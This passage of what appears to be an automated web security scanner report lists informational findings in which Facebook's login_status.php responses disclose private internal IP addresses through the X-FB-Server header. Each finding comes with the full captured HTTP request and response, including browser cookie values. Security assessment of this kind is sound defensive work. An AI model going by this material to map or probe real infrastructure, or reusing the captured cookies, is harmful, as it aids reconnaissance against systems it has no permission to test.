GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7f061cf4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32940a098%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df110415c4c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32940a098%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df210940f34%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d5355b7c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32940a098%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df210940f34&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2dc831238%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32940a098%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df210940f34&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1792fd018%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32940a098%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df210940f34&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.19.37
X-Cnection: close
Date: Thu, 16 Jun 2011 14:24:19 GMT
Content-Length: 22

Invalid Application ID

19.681. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.26.60

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df115977898%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21c8141dc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f2cab52%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21c8141dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df320aa2c94%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15cc49d%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21c8141dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df320aa2c94&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17455430%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21c8141dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df320aa2c94&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c37794%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21c8141dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df320aa2c94&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.26.60
X-Cnection: close
Date: Thu, 16 Jun 2011 19:14:06 GMT
Content-Length: 22

Invalid Application ID

19.682. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.234.109

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df194d809cc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17e34cb9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd1639c88%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17e34cb9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df213f2c34%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df393a6474%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17e34cb9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df213f2c34&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30ab91e68%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17e34cb9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df213f2c34&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df305bc082c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17e34cb9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df213f2c34&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.234.109
X-Cnection: close
Date: Thu, 16 Jun 2011 17:25:16 GMT
Content-Length: 22

Invalid Application ID

19.683. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.25.45

Request

GET /extern/login_status.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&app_id=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df395b5fb58%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1e06a7d9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27d09d574%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1e06a7d9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c2d419e%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df137f79fa8%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1e06a7d9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c2d419e&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df231671ddc%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1e06a7d9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c2d419e&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df331ff570%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1e06a7d9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1c2d419e&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702303714704576384051388321740.html?mod=WSJ_hp_mostpop_read
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.25.45
X-Cnection: close
Date: Thu, 16 Jun 2011 11:22:36 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=f231671ddc&origin=http\u00253A\u00252F\u00252Fonline.wsj.com\u00252Ff1e06a7d9c&relation=parent&transport=postmessage&frame=f1c2d419e", "http:\/\/
...[SNIP]...

19.684. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.176.36

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3943eb0d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff284b08ca8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38dc68e9%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff284b08ca8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a0800dfc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2402a57b4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff284b08ca8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a0800dfc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdc2e2b18%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff284b08ca8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a0800dfc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df5312a34c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff284b08ca8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a0800dfc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.176.36
X-Cnection: close
Date: Thu, 16 Jun 2011 13:06:48 GMT
Content-Length: 22

Invalid Application ID

19.685. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.125.37

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3325832ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb46cff4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14d2adb3%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb46cff4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd9e9788c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff54a49c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb46cff4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd9e9788c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19574d5c4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb46cff4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd9e9788c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16f2fe98%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb46cff4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd9e9788c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.125.37
X-Cnection: close
Date: Thu, 16 Jun 2011 18:37:43 GMT
Content-Length: 22

Invalid Application ID

19.686. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.43.33

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffee97bb8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff350bfd74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe1ce255c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff350bfd74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37ebae95c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df297600ca8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff350bfd74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37ebae95c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff14337c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff350bfd74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37ebae95c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e56ee984%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff350bfd74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37ebae95c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.43.33
X-Cnection: close
Date: Thu, 16 Jun 2011 15:36:39 GMT
Content-Length: 22

Invalid Application ID

19.687. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.101.40

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df291da9694%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a9bfff6%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8949c5b8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a9bfff6%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ff2783cc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6657a1a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a9bfff6%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ff2783cc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e934988%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a9bfff6%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ff2783cc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3200e4bb4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a9bfff6%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ff2783cc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.101.40
X-Cnection: close
Date: Thu, 16 Jun 2011 15:52:09 GMT
Content-Length: 22

Invalid Application ID

19.688. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.252.32

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1178b320%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f74f00e4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1672f2644%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f74f00e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df340d2d274%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df41a0c054%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f74f00e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df340d2d274&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2c06cf544%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f74f00e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df340d2d274&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d1530064%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f74f00e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df340d2d274&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.252.32
X-Cnection: close
Date: Thu, 16 Jun 2011 12:56:28 GMT
Content-Length: 22

Invalid Application ID

19.689. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.137.35

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e49c7c8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa0ab181%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1767cac8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa0ab181%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b6d5aab%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df397955988%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa0ab181%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b6d5aab&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1633c1b8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa0ab181%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b6d5aab&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17a5b4bd8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa0ab181%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1b6d5aab&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.137.35
X-Cnection: close
Date: Thu, 16 Jun 2011 18:06:39 GMT
Content-Length: 22

Invalid Application ID

19.690. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.190.106

Request

